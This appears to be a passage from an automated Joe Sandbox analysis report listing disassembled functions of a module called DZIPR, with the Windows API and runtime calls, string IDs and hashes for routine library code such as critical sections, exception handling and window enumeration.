                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          • Opcode ID: ae088e487e6031e22ccd7ccf9be3612f762c847a4159a2075ea03b0913f5d300
                                          • Instruction ID: db4d458d2a030d1923c4e0ae0249aeffeeeda11b557dd1840234c1cbe161bbce
                                          • Opcode Fuzzy Hash: ae088e487e6031e22ccd7ccf9be3612f762c847a4159a2075ea03b0913f5d300
                                          • Instruction Fuzzy Hash: FBF0E236204B009BDB119B3C9C0CE6B37BCAF876703194208F429D3280CB38E8478B70
                                          Function 6FA5140F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA4C220: EnterCriticalSection.KERNEL32(6FA734A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C25A
                                            • Part of subcall function 6FA4C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C26C
                                            • Part of subcall function 6FA4C220: LeaveCriticalSection.KERNEL32(6FA734A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C279
                                            • Part of subcall function 6FA4C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C289
                                            • Part of subcall function 6FA4BB0C: __EH_prolog3_catch.LIBCMT ref: 6FA4BB13
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FA51458
                                          • FreeLibrary.KERNEL32(?), ref: 6FA51468
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-3773518134
                                          • Opcode ID: e56ae0b887ab819834f2c895838ae351914a6b65dfb2e0b49db6e1e298e49dd0
                                          • Instruction ID: fc205bceb31cf62f812a29e330923f681f212209f48eda56b494539e2fe64242
                                          • Opcode Fuzzy Hash: e56ae0b887ab819834f2c895838ae351914a6b65dfb2e0b49db6e1e298e49dd0
                                          • Instruction Fuzzy Hash: 4A01A971104B06ABDB216FA4CA04B7A3BF4AF05369F04C528F95A9A590DB78E4E0CA11
                                          Function 6FA5C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 6FA5C7D6
                                            • Part of subcall function 6FA5C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FA5C767
                                          • _UnwindNestedFrames.LIBCMT ref: 6FA5C7ED
                                          • ___FrameUnwindToState.LIBCMT ref: 6FA5C7FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                          • String ID: csm
                                          • API String ID: 2163707966-1018135373
                                          • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                          • Instruction ID: 84f3b466a07c39a079b33e37d308e782338a7b8aa879ed378551a708b67ce1bd
                                          • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                          • Instruction Fuzzy Hash: F601E472000209BBDF125E61CE44EEA7F7AFF18358F144011BD1865568D73AA9B1EBA1
                                          Function 6FA5ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6FA577D7), ref: 6FA5ED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FA5ED8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          • Opcode ID: 5fdfba7001a883a55c885d9d4ea5ebcd357f2a9cd830f51e795806da3ed53df2
                                          • Instruction ID: 56fc47162a29a171c69b450adea352be48698323c1f756c94d6e99cdd56aaed3
                                          • Opcode Fuzzy Hash: 5fdfba7001a883a55c885d9d4ea5ebcd357f2a9cd830f51e795806da3ed53df2
                                          • Instruction Fuzzy Hash: 4CF03031A00A19D2DF002BB1ED597AF7B7ABF86756F820990E195E1084DF3494F1D345
                                          Function 6FA47D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          • Opcode ID: e435bb9acd511bb9cb64fe0343e433cba55ddd9091299be3796d5d46799bdaa7
                                          • Instruction ID: 296a3a0a7b70089aa64709d76604fe8027a7a95901b79491bba2775102d2a2ec
                                          • Opcode Fuzzy Hash: e435bb9acd511bb9cb64fe0343e433cba55ddd9091299be3796d5d46799bdaa7
                                          • Instruction Fuzzy Hash: EC510A715047459FDB20CF68C9459AAB7F8FF09320B148B2EE5A6D3690E738F985CB60
                                          Function 6FA6081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FA6084F
                                          • __isleadbyte_l.LIBCMT ref: 6FA60883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA540D8,6FA6BF84,00000000,00000000,?,?,?,?,6FA540D8,00000000,?), ref: 6FA608B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA540D8,00000001,00000000,00000000,?,?,?,?,6FA540D8,00000000,?), ref: 6FA60922
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 1d3e5d0e4f5cc782fac38d189b4ea9b48f532bc1e25b306497620f996814e1e6
                                          • Instruction ID: 1d4e1ec7facdcd2471b75e00886c1422e4d67175e1963c71c97f65afc1afba6b
                                          • Opcode Fuzzy Hash: 1d3e5d0e4f5cc782fac38d189b4ea9b48f532bc1e25b306497620f996814e1e6
                                          • Instruction Fuzzy Hash: E5319D31A04249EFEB00CFB4C880AAE3BB5AF02310F09D5AAE4659B1D1D334F9D1DB90
                                          Function 6FA48EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA48ED0
                                            • Part of subcall function 6FA49C7C: __EH_prolog3.LIBCMT ref: 6FA49C83
                                          • __wcsdup.LIBCMT ref: 6FA48EF2
                                          • GetCurrentThread.KERNEL32 ref: 6FA48F1F
                                          • GetCurrentThreadId.KERNEL32 ref: 6FA48F28
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CurrentH_prolog3Thread$__wcsdup
                                          • String ID:
                                          • API String ID: 190065205-0
                                          • Opcode ID: f305c65c66a888bc5dc63998cbaf0c40a574735e200807679d716831cd484982
                                          • Instruction ID: dff06573df1b5a948ffcba65e838125719299130c09062cef318e98b7b7b24c1
                                          • Opcode Fuzzy Hash: f305c65c66a888bc5dc63998cbaf0c40a574735e200807679d716831cd484982
                                          • Instruction Fuzzy Hash: 9F2188B0904B508FC7219F6A824524AFBE8BFA5704B10891FD1AA87B61CBB8A081CF50
                                          Function 6FA51D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA51D33
                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA51D5E
                                          • GetCapture.USER32 ref: 6FA51D70
                                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FA51D7F
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MessageSend$Capture
                                          • String ID:
                                          • API String ID: 1665607226-0
                                          • Opcode ID: a2d45fec9951fd61dddb499cfb25ee562686a4c47c09c02cd29c372b9f5d6aa7
                                          • Instruction ID: cd0b81e80aa9a69dd8c396efdf9a57103fb744c0367398daeec3ad5c8578422b
                                          • Opcode Fuzzy Hash: a2d45fec9951fd61dddb499cfb25ee562686a4c47c09c02cd29c372b9f5d6aa7
                                          • Instruction Fuzzy Hash: 89015A713406957BDE301F628CCCFFB3E7ADFCAB10F150078B6049A1E6CAA58890DA20
                                          Function 6FA46A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA46A8A
                                            • Part of subcall function 6FA468E2: _malloc.LIBCMT ref: 6FA46900
                                          • __CxxThrowException@8.LIBCMT ref: 6FA46AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,6FA6C050,00000800,000000FF,00000000,00000000,?,?,6FA6D898,00000004,6FA416A6,?,6FA4155A,8007000E,6FA413DE), ref: 6FA46AEA
                                          • LocalFree.KERNEL32(000000FF,000000FF,6FA4279F), ref: 6FA46B12
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          • Opcode ID: eb387d4d9e3b9ccfd80051a6f6b59071159477f95ca453e2839ef720d11b7553
                                          • Instruction ID: c592c8abdc1c94fe7207e2983e7c4ed652d5ed63b5ee843536d982f1e3f61426
                                          • Opcode Fuzzy Hash: eb387d4d9e3b9ccfd80051a6f6b59071159477f95ca453e2839ef720d11b7553
                                          • Instruction Fuzzy Hash: 29119E71610309AFDF04CF68CC40AA97BB5EF4A754F24C529F5248A3D0E73199908B60
                                          Function 6FA4D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FA4D194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6FA4D19D
                                          • swprintf.LIBCMT ref: 6FA4D1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FA4D1CB
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          • Opcode ID: b1e141ca61fc7a39525638ec4e482951c6258531ada6fc915d721074cb6b14c9
                                          • Instruction ID: 28d98a005c93dcd6fbedcca90b43ec98944ef691360ebe9d0b8ae111a59346aa
                                          • Opcode Fuzzy Hash: b1e141ca61fc7a39525638ec4e482951c6258531ada6fc915d721074cb6b14c9
                                          • Instruction Fuzzy Hash: F901A172500309BBDB009F688D45FAF77EDAF4A718F140419F901A7180DB78E955CBA0
                                          Function 6FA47287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA468E2: _malloc.LIBCMT ref: 6FA46900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FA472BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FA472C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FA472C4
                                          • GetLastError.KERNEL32(?), ref: 6FA472DF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          • Opcode ID: 7efff62b7edf525a49c274d1627cb23f4fc35a6e4dcead4af3fb63a1d3ea78ed
                                          • Instruction ID: 5c943b5ab178f27a088f1c77ed6941082c824a387f3b98a3075452dd80052c14
                                          • Opcode Fuzzy Hash: 7efff62b7edf525a49c274d1627cb23f4fc35a6e4dcead4af3fb63a1d3ea78ed
                                          • Instruction Fuzzy Hash: E301D431600701BBDB108BB5CD88F5A7BADEF85324F148415F514CB280DB74EC418760
                                          Function 6FA50F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6FA50F9D
                                          • GetTopWindow.USER32(00000000), ref: 6FA50FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6FA50FFA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          • Opcode ID: 62bac82df6822c2dd34d8b987d4502b78edef152ac8cd2381141078d757f55c8
                                          • Instruction ID: f8d7e84cede877753da727a6283c247793078154927a1fb666ef44523af62c14
                                          • Opcode Fuzzy Hash: 62bac82df6822c2dd34d8b987d4502b78edef152ac8cd2381141078d757f55c8
                                          • Instruction Fuzzy Hash: 1D01403204961BBBCF025F618D08EDF3F2AAF4A364F059011FA1055060C73AC5B6EBA1
                                          Function 6FA5EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction ID: 50ff7367b0fb02fc761d49ffeaf2db830f15d7b072642076a7adcfefb5176b93
                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction Fuzzy Hash: C81180B240028EBBCF125F84CD81CDE3F66BB18354B498415FA2858170D73AD6B1AB81
                                          Function 6FA503CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6FA503DC
                                          • GetTopWindow.USER32(00000000), ref: 6FA503EF
                                            • Part of subcall function 6FA503CF: GetWindow.USER32(00000000,00000002), ref: 6FA50436
                                          • GetTopWindow.USER32(?), ref: 6FA5041F
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          • Opcode ID: 41a41e7c773aaa92d134725f85823152e05f31b7d26378b50992b478fa18b650
                                          • Instruction ID: dbded180cdb01608a928652aa0a24f88895df5d0d3719770cac7b27b8b4c28ad
                                          • Opcode Fuzzy Hash: 41a41e7c773aaa92d134725f85823152e05f31b7d26378b50992b478fa18b650
                                          • Instruction Fuzzy Hash: F8018432145A1BAB8F222E618D04E8F3B79AF463ACF45E021FD1495001D739D5B29695
                                          Function 6FA6057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA60586
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA6059D
                                          • __amsg_exit.LIBCMT ref: 6FA605AB
                                          • __lock.LIBCMT ref: 6FA605BB
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          • Opcode ID: 9a6874b73062a001292bc5e33ff104271a79b8d6e7f542cb9a775cb576a3e1e3
                                          • Instruction ID: 3f63aef2c7ba6bf958448dd65f4b1a551698f85abbcd8f5494aa412cdd8a9d13
                                          • Opcode Fuzzy Hash: 9a6874b73062a001292bc5e33ff104271a79b8d6e7f542cb9a775cb576a3e1e3
                                          • Instruction Fuzzy Hash: 24F0B472A04720CFDB20ABB88601B4D33E5AF00738F45D50AD480AB2E0DB3CA5D2CF61
                                          Function 6FA4A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FA4A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FA4A6B6), ref: 6FA4A5AA
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA4A5CB
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA4A5DD
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA4A5EF
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA4A601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA4A6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6FA4A6E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
